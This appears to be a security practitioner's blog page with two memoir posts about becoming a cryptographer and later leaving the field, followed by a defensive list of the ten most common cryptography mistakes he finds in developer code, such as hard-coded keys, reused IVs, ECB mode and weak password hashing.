Speak up people!

Why I left cryptography

This blog is a follow-up on my previous blog, How I became a cryptographer, which describes the very long, intense journey I took to get to the state where I could make a living publishing research in cryptography.  A few people have asked why I left, so here I give my reasons.  This blog may be useful to people who are uncertain whether they want to make a similar journey.

Feeling disconnected from the real world

The biggest reason why I left is that I felt cryptography research was more focused on the mathematics than it was on the real world applicability.  As much as I love the mathematics, algorithms, and puzzle solving, I wanted to work on research that mattered.  But the longer I stayed in cryptography, the more disconnected I felt from the real world.

Truthfully, the restrictions I put on myself limited me: I did not want to leave Sydney and I did not want to spend the majority of my time teaching.  Had I not kept those restrictions, I could have had more chances.  With them, the only job that I found to keep me going was to be a PostDoc research fellow.

As a PostDoc research fellow, you are typically paid by a government research grant that may last a couple years.  When you are paid by such a grant, you need to deliver results that are in agreement with that grant so that in the future, you have evidence that can be used to apply for similar grants to keep you going.  And that cycles.

If you are really good and daring, you might stray from the research grant topic once in a while to see if you can make an impact somewhere else.  But your time for that is very limited.

I started on research grants involving number theory, then moved to research grants about cryptanalysis.  In this time, I got my top two research results, one of which influenced the field but unfortunately will never be used in the real world, the other of which had an important impact on what NIST declares acceptable today.  Also during that time, I did a lot of research that had hardly any relevance to the real world.

While being a PostDoc, I saw a lot of new crypto conferences popping up, and a lot of new crypto researchers publishing at new conferences.  Let’s just say that this was not due to an increase in quality in the field.  Instead, there were more opportunities to publish irrelevant research, which a researcher could use as evidence of making an ‘impact.’

I wanted to know what were the right problems to work on, but the longer I stayed in the field, the less vision I had on where to look.  I was stuck in the cycle, with no vision of what the real world needed.  I simply was not going to get that vision by continuing to do what I was doing.

Disillusionment

When designing a cipher, every cryptographer will tell you the first requirement.  Nobody will look at it unless it follows Kerckhoffs’ principle: the security of the cipher should depend upon the secret key and nothing else.  No secret algorithms.

With the AES selection competition between 1997-2000, several cryptographers tried to raise the bar.  Instead of just coming up with a design and relying on others to attack it, the designers should put some effort in themselves to show that it does not trivially fall to common attacks such as linear and differential cryptanalysis.  I myself worked with the RC6design team (though I was not a designer myself), and we provided extensive analysis on the security of RC6.  We were proud of this.

However, a competitor algorithm went much further.  Not only did the designers attempt various cryptographic techniques against their design, but they also proved (under reasonable assumptions) that the design was resistant to first order linear and differential cryptanalysis.  The proof was via the Wide Trail Strategy.  Their cipher, Rijndael, was the favourite amongst the majority of the cryptographers, and ultimately won the AES competition.  Even as a competitor to them, there is no doubt in my mind that the right cipher won.

This was great.  With the turn to the 21st century, we had a new standard of excellence.  Moving the bar beyond the 19th century Kerchoffs’ principle, we now require designers to put substantial effort into analysing and proving the security of their design before presenting it to us.  Right?

That was my thought, but it is totally wrong.  For two reasons:

  • With the increase in the number of crypto conferences and crypto researchers, there was no possibility of enforcing a standard of excellence.  The doors were (and still are) wide open to publish a low quality design in a low quality conference.
  • Ultimately a fair number of designs get used in the real world long before going through a rigorous analysis and peer review process.

Sure, some designs start getting attention after they have been in use for a while, and by that time we either find problems in them or else fall back to “this algorithm has been in use for a long time and nobody has found problems with it, therefore we can trust it.”  And thus, the science is not maturing.

It is a lot easier to design something than it is to break something.  For every one man-hour used to design, it can take one or two orders of magnitude more man-hours to analyse, or maybe even more (depending upon the skills of the designer).  The cryptanalysist simply cannot keep up with the designers, so we instead declare that we will not look at their design for whatever reason.

I wish cryptography would get beyond Kerchoffs’ principle.  I wish the effort between design and cryptanalysis was more balanced.  I wish we could give designers more practical advice on what it takes for their cipher to get attention.

I don’t believe that will ever happen.

A lot of labour for little reward

I started out with an attitude like Paul Erdős, but eventually materialism crept in.  It’s a lot easier to be idealistic when you are young and single than it is when you’re beginning to settle down and think about having a family.

As my software skills were dated, I felt very lucky that I could get out when I did.  Fortune brought me to a fantastic printer research company in Sydney that were mainly looking for smart people.  They offered me a good salary, and I was happy to leave cryptography behind.

I was able to maintain a decent salary, but it took me a good 7 years or so before I got to the point where I had strong enough skills in demand so that I could change employment without too much difficulty if I needed to.

Every now and then I get a call from a recruiter about a bank or other large company looking to hire a cryptographer.  They don’t need a researcher, instead somebody who really knows and can advise about cryptography.  I stopped pursuing these potential opportunities: they pay well, but my interests in security go way beyond cryptography, so I don’t want to pigeon-hole myself as a cryptographer only.

What I do today

Now I do more general security, which includes code review, penetration testing, and architecture/design.  I have strong skills in web security and embedded security.  I like having this breadth of expertise, but I also have an depth of expertise in cryptography, which distinguishes me from most people who do similar work.  The cryptography background is definitely a benefit.  But I am sure glad that I do a lot more than just that.

 

How I became a cryptographer

One of the questions that keeps on appearing over and over in Reddit’s /r/crypto is how to become a cryptographer.  For example this and this and this and this and this.

I often reply to these in comments. But given that the questions keep coming up, I thought it would be good to write up something more complete that I could reference back to. In doing so, I hope I can pass on some valuable tips that I learned the hard way on what it takes to “make it.”

When I say “make it”, I’m referring to being able to make a career as a cryptographer and nothing more. This blog assumes you understand what I mean by “cryptographer”: see Schneier’s article from 1999.  In short, I am showing the path I went down in order to be able to make a living publishing research papers on cryptography, which is not the same as being a practitioner using cryptography.

Often people replying to “how to become a cryptographer” say get a PhD in cryptography and publish lots of papers. That does not answer the question of “how do I qualify myself to get a PhD?” or “How do I learn to think like a researcher?” or “How do I do research?” Nor does it tell how to do significant research. I hope my blog provides some guidance on these questions.

I myself consider that I made it to the level of mediocrity as a cryptographic researcher. I certainly was no star. But I also started late in the game in terms of developing the way of thinking like a researcher. I believe most of the others had the tendency towards mathematical thinking from a young age. Because of that, I had a lot of catching up to do to compete with many from the field. If you’re reading this blog, then you might be like I was, and thus I hope it provides some helpful tips to you that I had to learn the hard way.

Here are what I believe are the 7 magic ingredients to becoming a cryptographer (in no particular order):

  • You need to be a brilliant mathematician (amended advice given here).

  • You need to be very strong in algorithms, including development and analysis.

  • You need to work your tail off.

  • You need to be creative in problem solving.

  • You need to be passionate about the field you are in.

  • You need to surround yourself with experts in the field.

  • You need a bit of luck (but luck happens when preparation meets opportunity!)

Now I tell my story.

My mischievous youth

I believe that those who have achieved a far-reaching life goal can look back at points from their early ages that contributed to where they are today, so this is where I start.

One trait I had that really contributed to my eventual career was my passion for creative puzzle solving. I personally was not so keen on listening to others (which is not good, by the way): instead I spent many hours trying to find solutions myself. In the early days, this manifested in examples like coming up with my own way to solve the Rubik’s cube, never reading the book.

I guess around 10 years old, I started using a computer and learning to program it. It spent many hours, not shy to sacrifice a whole weekend, to make computer games. By the time I got my first 300 baud dial-up modem, I learned about bulletin board systems (BBSs) where nerds like me developed online social lives. For those who don’t know about BBSs, think of it as like a stone-age Facebook.

It didn’t take long before thoughts of mischief on BBSs popped into my head. I spent many hours reading source code of the main BBS that Commodore 64 users were using and thinking about how I could do stuff that the system was not intended to do. I had particular interest in destructive actions solely for the purpose of childhood entertainment. My specialty was crashing (i.e. Denial of service) BBSs. Yes, I was extremely immature.

By age of 16, I was lucky to have access to a local free-to-use Unix system that I could dial into. It didn’t take long before I was exploring the cool /etc/passwd file. A friend of mine had discovered the algorithm that created the password hashes, and I spent many, many hours with no success in trying to invert that algorithm. This was my first exposure to modern cryptography, though at the time I did not know that I was trying to invert a hash function based upon the Data Encryption Standard (DES).

Being exposed to a Unix system and the C programming language 2 years before starting University gave me a head start. Knowing how to program and hack also made me a good candidate for becoming a cryptographer. But I was lacking what may be the most important ingredient: I was not a brilliant mathematician. Don’t get me wrong: I was decent at mathematics, but by no means brilliant. Maybe I was in the top 15% in my class. That’s nothing compared to most cryptographers who were surely the #1 in their school and beyond. For example, looking at the list of Putnam Fellows (top undergraduate mathematicians in the USA and beyond), one will see several cryptographers on the list.

University learning: changing the way I think

Because I was lucky enough to have my parents pay for my University education in America, I was free to commit a lot of time to learning. I wanted my parents to know that their money was not being wasted, so that drove me to work hard. Extremely hard work.

At the same time, I was going through some phase of not trusting anything. This was back in the Cold War days, when we were told that Russian people are evil and they all wanted to kill us and eat our brains. I was not that gullible, and the skepticism I had developed towards authoritative sources of information ended up being the essential ingredient in changing my way of thinking towards the direction of a researcher.

I did pretty well in my classes, though I often came up with reasons for not believing what they were teaching me, especially physics. I looked to come up with an excuse on why it could be wrong. Can the science of physics be wrong? In order to prove something about reality, you need to make assumptions about reality, and that’s the part that I could always question. Footnote: I no longer take such an extreme skepticism towards everything.

After dismissing physics, next came mathematics. How can I show it is wrong? This is an interesting question, because I like many people “learned” mathematics by “memorising the formula” and using it to solve problems. But if I am questioning everything, I can’t take the approach. Instead, I need to disprove the formula. This became a whole way of thinking for me.

When you go to University, you get lectures that you take notes from and a book to read. Which one am I supposed to learn from? I don’t know. I’ll try both.

In the end, I could not make any sense out of my notes, but I could learn from reading the book. The book gives you so much more information that can be packed into a one hour lecture, but the consequence is that you need to spend a lot more time learning. And if you want to disprove the book, you have to spend even more time!

So there I went: reading every single sentence and formula from the book, one-by-one, and trying to disprove it. And absolutely not going to the next one until I am 100% convinced that the sentence or formula is logically correct. To my surprise, I never came across a single thing I could disprove (other than perhaps small mistakes that were easy to correct). And this is what attracted me to mathematics, which ultimately provided me with the thought process I needed to become a cryptographer.

This I believe illustrates an important difference between how most people learn versus how people who end up becoming cryptographers/mathematicians learn. Most people trust the authoritative source. If you want to be a cryptographer, you cannot have that mindset. Instead, you need to question everything and confirm that everything you are being told is true.

Understand why. We cryptographers all the time are seeing new ciphers with miraculous security claims. If we were to not question things like we do, then there would be a whole lot of snakeoil used in the real world. When a mathematician reviews a proof, he looks for anyway that it may be incorrect – especially edge cases come into play. Similarly, if you can find any exception to a proof or claim of security for a cipher (especially edge cases come into play), that could be the key to breaking it. Sometimes finding flaws in security proofs have huge implications even if the flaw does not translate into an immediate break of the construct.

I later learned that you need to go beyond that: you have to be able to prove the same thing you are reading, not just check that it is true. This of course is an even bigger time commitment, but you eventually learn to figure out the key points of the proof and then reconstruct the rest of it yourself.

When I did homework, I went to the library. Before I started, I would look around and carefully remember anybody I could see around me. After that I would start doing homework, giving full attention to my homework until it was all done. Then, I would look around to see if there is anybody still there that got there before me: my rule was nobody can study harder than me. If I found somebody, it meant that I needed to keep on studying. If there was no homework left to do, find a book to read on my current subject and learn a lot more than what the notes and the other kids in the class are learning.

For some classes, I really enjoyed this. For example, in discrete mathematics / combinatorics, I went to great extents to try to find problems I could not solve. I had mastered the class textbook, which I loved, but I was able to find some very old books in the library that were 100% dedicated to tricky combinatorial problems, and I worked out every one of them until I got to the point that I could solve just about anything thrown at me.

As you can see, I worked my tail off at the University and changed my way of thinking. I did not know it at the time, but this was actually my “catch up” time for getting my mind thinking the way the brilliant mathematicians who end up becoming cryptographers think.

I ended up with a double degree in mathematics and computer science. I did quite well, getting almost all A marks in mathematics and computer science, but not always the same success in other subjects. In my third year of University, I did a graduate level class in cryptography, which I loved, and decided that I wanted to do as a career. I just didn’t know how, but I did know that graduate school is probably the right direction forward.

Graduate school: learning to do research

My parents were generous enough to pay for my undergraduate education and expenses, but now that I was all grown up, it was time for me to cover myself.

I tried very hard to get scholarships to help pay for my graduate school education. But at the end of the day, I was competing with students who already have patents, publications, and the like. Also, I was against all-A students and students that have scored perfect on their GRE. How could I possibly compete? The answer was that I needed to earn my way by being a teaching assistant (TA). Being a TA is a huge time commitment, which takes away from the learning that I really wanted to do, but it was the only way I could go forward.

I got accepted to some decent Universities, but top schools like MIT and Stanford were quick to turn me down. Of the ones that accepted me and offered me enough income from TA to pay my way, I decided to go to University of Wisconsin-Milwaukee Computer Science Department, which had a few cryptography professors. I was considered the star student of the time, but in retrospect, this guy turned out to far out-shine me.

I spent two years there taking classes and doing research. My research focus was number theory, particularly integer factorisation. Although I did well in mathematics as an undergrad student, it seems that one really needs to have a lot deeper mathematics background to do innovative research in factoring, so I mainly focused on implementation.

At that time, Arjen Lenstra at Bellcore was in his early days of what would be his long streak of smashing integer factoring records. I loved his research, but I also viewed him as my competitor: if I am going to “make it”, I need to beat him.

Just as an undergrad, I was working my tail off. I was 100% committed to intellectual development. When I wasn’t doing TA duties, class work, or research, I was reading the Usenix groups such as sci.crypt and sci.math, and contributing to discussions. I also spent a lot of time breaking amateur ciphers that were posted on sci.crypt.

After 2 years, I was completing my Masters Degree and was exhausted from all the hard work. I decided that I needed to take a whole summer break just to gather myself. But fortune had another plan for me.

I received an email from Arjen Lenstra. This was not long after he had factored RSA-129, which got international press. Arjen was looking for a summer intern to work with at Bellcore.

There I was: exhausted, feeling as if I had spent 6 years fighting Mike Tyson, needing a rest, and then getting an email from my “competitor” asking if I wanted to work with him. What was I to do?

Thankfully, my parents and friends had set my mind straight. I was wanting to turn it down, but they said I would be absolutely crazy to do it, and they were right. I took the opportunity, which turned out to be the single most important decision in my career. Let me be 100% unambiguous: if I would have declined this opportunity, I would never had made it as a researcher. Luck definitely played a role for me.

One of the most important things I learned from Arjen is that when I develop new algorithms, I need to prove that they are correct. This is obvious to a researcher, but it was not obvious to me. I had ways of solving problems that he wanted me to work on, but he said he wanted proofs before I went ahead and implemented them. And so I did.

In all honesty, I didn’t feel like I did great working for him that internship, but I had enough background in what he wanted me to work on to make me succeed. As I said, I was exhausted from all the studying and TA duties, so I did not commit 100% like I had done for University study. I also had planned to take my time off to gather myself at the end of the 3 month internship.

To my surprise, as the internship came to an end, he asked what I was doing after it. I said “nothing.” He then asked why not stay working there until the end of the year. Hmmm, the pay is good, the experience is great, and what he wants me to work on is exactly what I want to work on. I’ll take it.

I spent the next approximately 5 months working on a project with Arjen that really excited me. We were using the MasPar massively parallel computer to implement fast linear algebra algorithms to solve factoring matrices. We ended up writing a research paper on it, but it never got submitted anywhere. This was my fault: I was too busy to finish it off, and I thought it was research that nobody would be interested in. I was wrong.

During that time, I got back into the mindset of a researcher and I seem to have forgotten that I needed time to gather myself. I decided that having a Masters in Computer Science was not really what I needed: instead I needed an advanced degree in Mathematics. And I was 100% certain that I wanted to do that working for Carl Pomerance at the University of Georgia.

Carl was a well known star in Number Theory. He along with Andrew Granville and Red Alford just completed a proof that there are infinitely many Carmichael numbers, which excited me. Carl was also well known for factoring. I didn’t realise it at the time, but one of the reasons why everybody knew Carl is because he wrote his research so well that even an idiot like me could understand it. Not many mathematicians have that skill.

I thought I would be able to comfortably get into the University of Georgia, but I was wrong. On paper, I was borderline to get into their Masters program, and especially, getting a TA job was going to be tough.

Completely out of character for me, I decided to make a 10 hour drive to Georgia to meet with Carl and other people at the University, and convince them that they should accept me as a graduate student. I wonder to this day if they ever had anybody else approach them like that. I went there, talked to a number of Professors, told them about who I am and what I wanted to do. If nothing else, they saw the passion for mathematics and research in my eyes, and combining that with a letter of recommendation from Arjen, they decided to give me a shot. I got accepted and was offered a TA position.

Truthfully, I don’t know if they really believed that I would make it, and rightfully so. I did not know about the level of competition I was going to find at this University, but as before, I was able to make up the difference by extremely hard work. This was also the time that I learned that checking the proofs is not enough: you need to be able to prove everything in the book yourself.

I surprised a lot of people and eventually they accepted me as a PhD student. Carl Pomerance and others really believed in me. But eventually, 8 years of intense University studying had clobbered me. I was beat and financially in debt, and I really needed a break. Carl tried hard to convince me to go through with the PhD, but I just couldn’t find the drive any longer. I bailed out with a Masters degree.

At this point I had a double Bachelors degree in Mathematics and Computer Science, a Masters degree in computer science, a Masters degree in Mathematics, and letters of recommendations from big shots Arjen Lenstra (pretty much the top computational number theorist ever) and Carl Pomerance (big shot analytical number theorist). Suddenly, how I looked on paper was representative of how good I considered myself to be. And with that, I got a position in industry as a research associate that I believe I deserved, working for RSA Labs at RSA Data Security.

The only catch is, even though I did research to get my Masters degrees, my research was not particularly innovative. So I can’t call myself a researcher yet.

Getting my first publications

It took me a bit of luck to upgrade my skills and get myself where I needed to be in University and graduate school, but at this point I believe that I truly was the best person for the position I took at RSA Labs. Having said that, what an amazing opportunity it was to see minds like Ron Rivest and Yiqun Lisa Yin in action.

It happened to be a convenient time to work there, as there was a call for an Advanced Encryption Standard and RSA Labs had one of the top candidates: RC6.

Ultimately, I had no contribution making it to the final design of RC6, but I was able to make contributions to the analysis. My tendency to disbelieve anything that lacked a proof was instrumental for me in attempts to check the heuristic analyses that the team did to understand the security. It turned out that the heuristic analyses didn’t hold for some simplified variants of RC6, which resulted in my first publication, with Ronald Rivest, Matt Robshaw, and Yiqun Lisa Yin as coauthors.

It was not that difficult to get this result.  I wrote a program to try to verify heuristic claims.  I saw that those claims were not always correct.  I spent time understanding why the claims do not work via debugging and analysis, and worked with my colleagues to develop the analysis further.  Then formal proofs, write-up, and publication.

I did a fair amount of work with Yiqun Lisa Yin, who helped me get a few other publications coauthored with her. She is a brilliant mind and knew where the research community was going. She had the great ideas and I helped where I could.

Despite my success in getting publications, I felt: (1) the results are not significant enough to make me feel as I have “made it” as a researcher, and (2) except in the one publication above, the main ideas were largely coming from other people rather than myself.

Getting significant research results

The position at RSA Labs lasted about 2 years, at which time the company who bought out RSA decided that research in cryptography was not so important, so cut off the West coast research arm.

For a number of years after that, I went back and forth between academia and industry, seeking another position like I had at RSA Labs. I wanted to be do research but also develop software. It turned out that such positions are extremely rare.

I had a couple positions that are normally for post Doctorate students despite not having a Doctorate. One of those was at Macquarie University, with the aim of doing research in Number Theory.

Unfortunately, I did not have strong enough background to do significant research in Number Theory, at least I didn’t think so. I did get a few crypto publications during this time, but I felt they were fairly small results. Towards the end of the appointment, I was ready to give up.

(Side note: I actually did my PhD while at the same time holding this PostDoc position).

It was my office-mate, Ron Steinfeld, who suggested that we look at hash functions. He had some ideas that I was happy to work on him with.

Somehow, I got distracted and started thinking about a hash function built by multiplying small primes together. I wrote a simple equation on the whiteboard and looked at it. I then noticed that if there is a collision, something remarkable happens.

I turned away and thought, “no I need to get back to number theory research.” Gratefully, the little man in my head shook my brain and screamed: “What’s the matter with you, idiot! There’s something interesting here!” So I went back to the equation, thought about it more, and then convinced myself that there is opportunity here. I showed it to Ron, and he said this looks like a breakthrough.

Ron helped me formalise it and justify its significance, and we wrote it up in pretty good detail. Igor Shparlinski helped us in an essential analysis part, but he said he didn’t think his contributions were significant enough to coauthor. We then showed it to Arjen, who had an idea to make it faster and helped the overall writeup.

Finally, I had my breakthrough. The VSH hash function was published in Eurocrypt. The paper happened just after the Wang et al were breaking all the practical hash functions. I had solved the right problem, in the right way, at the right time. Or at least so I had thought.

Another significant area I worked on was HMAC. Given that the hash functions are broke, what are the implications to it? Yiqun led this. My main contribution was coming up with practical algorithms to attack HMAC and NMAC given hash collisions, which was significant to the paper. So this was my second significant research result.

Finally, I feel like I had made it as a cryptography researcher. Finally I started having confidence that I could make a career doing this. Ironically, I decided to not do so.

Additional tips for those aiming to become cryptographers

I would like to think I have learned a thing or two about research in all these years of effort. So here is the advice I pass on to those who are just making the journey.

The number one advice is read Richard Hamming’s advice on how to do great research. I first discovered this while doing my “PostDoc” research at Macquarie University. I must have read this at least 10 times thereafter. You need to know where the field is going to make significant contributions. If you don’t work on the right problems, you’re not going to have an impact. Surrounding yourself by experts in the field will help guide you in making an impact. Don’t be afraid of going after the big problems.

Another point from Hamming is selling your research. He is so right. When I first got publications, I considered the writeup the boring part: I had solved a problem, now I need to waste all this time writing it up rather than go out and solve more problems? Absolutely the wrong attitude. Think about the people you look up to as researchers. You might have names like Dan Boneh, Adi Shamir, etc…. If your list is anything like mine, you may notice that they are great communicators. They write well and they present their research well. If you can clearly explain and motivate the problem you are trying to solve, it will not only attract others to your research, but it will also help you better understand the value of your research and the interesting directions you can go.

Doing research is frustrating. One of the things that threw me off is that although I was very good at a lot of things, I just did not have the mathematical depth of many people in the field. How could I do compete with them?

It wasn’t until VSH that it dawned upon me that you don’t have to be the greatest mathematical mind to make an impact. Think of great impacts like RSA: it was just a coincidence that it was invented by some of the best cryptographers ever, but mathematically it really is very simple. Another example is Shamir Secret Sharing: such a simple concept with great impact: it is only a coincidence that it was invented by the greatest cryptographer ever! My point is that don’t be intimidated like I was just because other people know more – often simple ideas have the biggest impact. Try a lot of ideas, and be creative and persistent.

It really helps a lot to master some mathematical tools. For me, smoothness was what helped me, and it had only been used minimally for constructive purposes in cryptography before.

Many times I thought to myself “I really need to master lattices”, but then later dismissed it: “I’m too late: all the low hanging fruit is gone.” I was so wrong: it was never too late!

Why I left cryptography

If there is interest, in a future blog I will write about why I left cryptography.

Top 10 Developer Crypto Mistakes

After doing hundreds of security code reviews for companies ranging from small start-ups to large banks and telcos, and after reading hundreds of stack overflow posts on security, I have composed a list of the top 10 crypto problems I have seen.

Bad crypto is everywhere, unfortunately. The frequency of finding crypto done correctly is much less than the number of times I find it done incorrectly.  Many of the problems are due to complex crypto APIs that are insecure by default and have have poor documentation. Java is the biggest offender here, but it does not stand alone. Perhaps Java should learn from its archenemy, .Net, on how to build a crypto API that is easier to use and less prone to security problems.

Another reason for so many problems is that finding the issues seems to require manual code analysis by a trained expert. According to my experience, the popular static analysis tools do not do well in finding crypto problems. Also, black-box penetration testing will almost never find these problems. My hope in publishing this list is for it to be used by both code reviewers and programmers to improve the state of crypto in software.

The list:

1. Hard-coded keys
2. Improperly choosing an IV
3. ECB mode of operation
4. Wrong use or misuse of a cryptographic primitive for password storage
5. MD5 just won’t die. And SHA1 needs to go too!
6. Passwords are not cryptographic keys
7. Assuming encryption provides message integrity
8. Asymmetric key sizes too small
9. Insecure randomness
10. “Crypto soup”

Now we break it down in detail:

1. Hard-coded keys

I have seen this very often. Hard-coding keys implies that whoever has access to the software knows the keys to decrypt the data (and for those developers who start talking about obfuscation, my 10th entry is for you). Ideally, we never want cryptographic keys accessible to human eyes (for example, see what happened to RSA about six years ago). But many companies fall far short of this ideal, and therefore the next best thing we can ask is to restrict access to the keys to a security operations team only. Developers should not have access to production keys, and especially those keys should not be checked into source code repositories.

Hard-coded keys is also indicative of insufficient thought about key management. Key management is a complex topic that goes well beyond the scope of this blog.  But what I will say is if a key gets compromised, then rotation of a hard-coded key requires releasing new software that must be tested before going live.  Releasing new software takes time, which is not a luxury when incidents like this happen.

It’s easy for security people to tell developers what not to do, but the unfortunate reality is that what we really want them to do is often not feasible for whatever reason. Therefore, developers need some middle-ground advice.

A big caveat here that I am not a security operations person nor an expert on key management, but I can comment on what I have seen from a distance in some places.  Even though it is less than ideal, a configuration file is a better option for key storage than hard-coding it. Although some frameworks support encrypted configuration sections (see also this .Net guidance) what is really needed is for developers to have test keys for their test and development environments, and these keys are replaced by real keys by a security operations team upon deployment into the live environment.

The above guidance I have seen this botched up in practice. In one case, the deployment team put in an RSA public key incorrectly, and was not able to decrypt because they didn’t have a private key corresponding to the erroneous public key. My advice is that the software needs a means to test itself to make sure it can encrypt/decrypt (or whatever operation it needs to do), or else there needs to be a procedure as part of the deployment to make sure things work as expected.

2. Improperly choosing an IV

IV means initialization vector.  This problem is usually with CBC mode of encryption. Very often it is a hard-coded IV, usually all 0s. In other cases, some magic is done with a secret (sometimes the key itself) and/or a salt, but the end result is that the same IV is used every time. The worst one I have seen, on three occurrences, is the key also used as the IV — See Section 7.6 of Crypto 101 on why this is dangerous.

When you are using CBC mode of operation, the requirement is that the IV is chosen randomly and unpredictably.  In Java, use SecureRandom.  In .Net, simply use GenerateIV.  Also, you cannot just choose an IV this way once and then use the exact same IV again for another encryption.  For every encryption, a new IV needs to be generated. The IV is not secret and is typically included with the encrypted data at the beginning.

If you do not choose your IV properly, then security properties are lost. An example of improper choice of IV where the implications were huge is in SSL/TLS.

Unfortunately, APIs are often the problem here. Apple API is a perfect example of what not to do (note: I am using  this mirror of Apple’s code so I can link directly to the evidence) — tell developers it is optional and use all zero if it is not provided. Sure, it will still encrypt and decrypt, but it is not secure Apple!

More information about requirements for IVs and nonces in various modes of operation is given here.

3. ECB mode of operation

When you encrypt with a block cipher such as the AES, you should choose a mode of operation.  The worst one you can choose or have chosen for you is ECB mode, which stands for Electronic Code Book.

It doesn’t matter what block cipher is under the hood: if you are using ECB mode, it is not secure because it leaks information about the plaintext. In particular, duplicate plaintexts become duplicate ciphertexts. If you think that doesn’t matter so much, then you probably have not seen the encrypted penguin yet either (this image is Copyright Larry Ewing, lewing@isc.tamu.edu, and I am required to mention The GIMP):

ECB_Penguin

Bad APIs, like Java, leave it up to the provider to specify the default behaviour. Typically, ECB is used by default. Embarrassingly, OWASP gets this wrong in their “Good Practice: Use Strong Algorithms” example, though they get it right here, which is one of the few places on the internet that looks to be free of problems.

Bottom line: Don’t use ECB mode.  See here for guidance on modes that are safe to use.

4. Wrong use or misuse of a cryptographic primitive for password storage

When a crypto person sees PBKDF2 being used with 1000 iterations for password storage, they may complain that 1000 iterations is too few and a function like bcrypt is a better choice anyway. On the other hand, I have seen so much worse that I’m just excited that the developer is on the right track.

Part of the problem here is terminology, which the cryptographic community has made no effort to fix. Hash functions are wonderful, magical functions. They are collision resistant, preimage resistant, 2nd preimage resistant, behave like random oracles, and they are both fast and slow at the same time. Maybe, just maybe, it is time to define separate cryptographic functions for separate purposes rather than relying too much upon a single source of magic.

For password processing, the main properties we need are slow speed, preimage resistance, and 2nd preimage resistance. The slow speed requirement is explained wonderfully by Troy Hunt.

There are specific functions designed to meet these goals: pbkdf2, bcrypt, scrypt and argon2. Thomas Pornin has played an excellent role in helping developers and security engineers understand this. Now if only we can get rid of the MD5, SHA1, SHA256, and SHA512 implementations for processing passwords!

Also, I sometimes see APIs that make available PBKDF1, which really should not be used any more. Examples include Microsoft and Java.

Additionally, another common problem I see is hard-coded salts when doing password processing. One of the main purposes of the salt is so that two identical passwords do not “hash” to the same value. If you hard-code the salt, then you lose this property. In this case, one who gets access to your database can readily identify the easy targets by doing a frequency analysis on the ‘hashed’ passwords. The attacker’s efforts suddenly become more focused and more successful.

For developers, my recommendation is to do what Thomas Pornin says. He has commented on various aspects of password processing frequently on the security stack exchange.

Personally, I would go with bcrypt if that is possible. Unfortunately, many libraries only give you PBKDF2. If you are stuck with that, then make sure you use at least 10,000 iterations and be happy that your password storage is better than most.

5. MD5 just won’t die. And SHA1 needs to go too!

MD5 has been broken in practice for more than 10 years, and there were warnings against using it for more than 20 years.  Yet I am still finding MD5 in many, many places. Often, it is being used in some crazy way where it is not clear what the security properties are that they need.

SHA1 has been broken in theory almost as long as MD5, but the first real attack only came recently. Google has been doing well in deprecating from certificates years before the practical break, however SHA1 still exists in developer code in many places.

Whenever I see developer code using a cryptographic hash function, I get worried. Often they do not know what they are doing. Hash functions are wonderful primitives for cryptographers to use in building useful cryptographic primitives such as message authentication codes, digital signature algorithms, and various prngs, but letting developers do what they please with them is like giving a machine gun to an 8 year old. Developers, are you sure these functions are what you need?

6. Passwords are not cryptographic keys

I see this often: not understanding the difference between a password and a cryptographic key. Passwords are things people remember and can be arbitrary length. Keys on the other hand are not limited to printable characters and have fixed length.

The security issue here is that keys should be full entropy, whereas passwords are low entropy by nature.  Sometimes you need to change a password into a key.  The proper way to do this is with a password based key derivation function (pbkdf2, bcrypt, scrypt or argon2), which compensates for the low entropy input by making the derivation of the key from the password a time consuming process.  Very seldom do I see this done.

Libraries like Crypto-js blend the concepts of keys and passwords together, and inevitably people who use it wonder why they cannot encrypt in JavaScript and then decrypt in Java or .Net or whatever other language/framework. Worse, the library uses some awful algorithm based upon MD5 to convert the password to a key.

My advice to developers is whenever you find an API that offers passwords or passphrases to encrypt, avoid it unless you specifically know how the password is converted to a key. Hopefully, the conversion is done with an algorithm such as PBKDF2, bcrypt, scrypt, or argon2.

For APIs that take keys as input, generate the keys using a cryptographic prng such as SecureRandom.

7. Assuming encryption provides message integrity

Encryption hides data, but an attacker might be able to modify the encrypted data, and the results can potentially be accepted by your software if you do not check message integrity. While the developer will say “but the modified data will come back as garbage after decryption”, a good security engineer will find the probability that the garbage causes adverse behaviour in the software, and then he will turn that analysis into a real attack. I have seen many cases where encryption was used but message integrity was really needed more than the encryption. Understand what you need.

There are certain encryption modes of operation that provide both secrecy and message integrity, the best known one being GCM. But GCM is unforgiving if a developer reuses and IV. Given how frequent the IV reuse problem is, I cannot recommend GCM mode.  Alternative options are .Net’s Counter with CBC-MAC and Java BouncyCastle choices of CCMBlockCipher, EAXBlockCipher, OCBBlockCipher.

For message integrity only, HMAC is an excellent choice. HMAC uses a hash function internally, and the specific one is not too important. I recommend that people use a hash function such as SHA256 under the hood, but the truth is that even HMAC-SHA1 is quite secure even though SHA1 lacks collision resistance.

Note that encryption and HMAC can be combined for both secrecy and message integrity. But the catch here is that the HMAC should not be applied to the plaintext but instead to the ciphertext combined with the IV.  Acknowledgments to the good people at /r/crypto for correcting earlier versions of this section.

8. Asymmetric key sizes too small

Developers do really well in choosing their symmetric key sizes, often choosing much stronger than they need (128-bit is enough). But for asymmetric crypto, they often err on the other side.

For RSA, DSA, DH, and similar algorithms, 1024-bit is within reaching distance of an organisation such as the NSA, and will soon become reachable by smaller organisations with Moore’s law. At the very least, using 2048-bits.

For elliptic curve based systems, one can get away with much smaller key sizes. I have not seen these algorithms used by developers so often, so I have not seen problems with key sizes for them.

General guidance on key sizes is provided here.

9. Insecure randomness

I’m surprised that this does not occur more often, but I do find it from time to time. The general issue is that typical (pseudo) random number generators may look random to the untrained eye, but they fail to meet the unpredictable requirement to the trained expert.

As an example, imagine you are using java.util.Random to generate a session token for a web application. When I as a legitimate user get my session token, I (using my crypto expertise) can then predict the next session token for the next user and the previous session token for the previous user. I can then hijack their sessions.

This would not be possible if the session token is generated with SecureRandom. The general requirement is a pseudo random number generator with cryptographic security. In .Net, the good source is System.Security.Cryptography.RandomNumberGenerator.

It is also worth mentioning that just because you are using a good source of randomness does not mean that you cannot screw up. For example, I saw one implementation that took a 32-bit integer from SecureRandom and hashed it to produce a session token. It never occurred to the developer that that implies at most 2^32 possible sessions, which would allow an attacker to hijack one just by enumerating these values.

10. “Crypto soup”

I use this term to mean a developer mixing a bunch of cryptographic primitives together without a clear goal. I don’t like to call it roll-your-own-crypto, because I think of that term attempting to build something where the goals are clear, such as a block cipher.

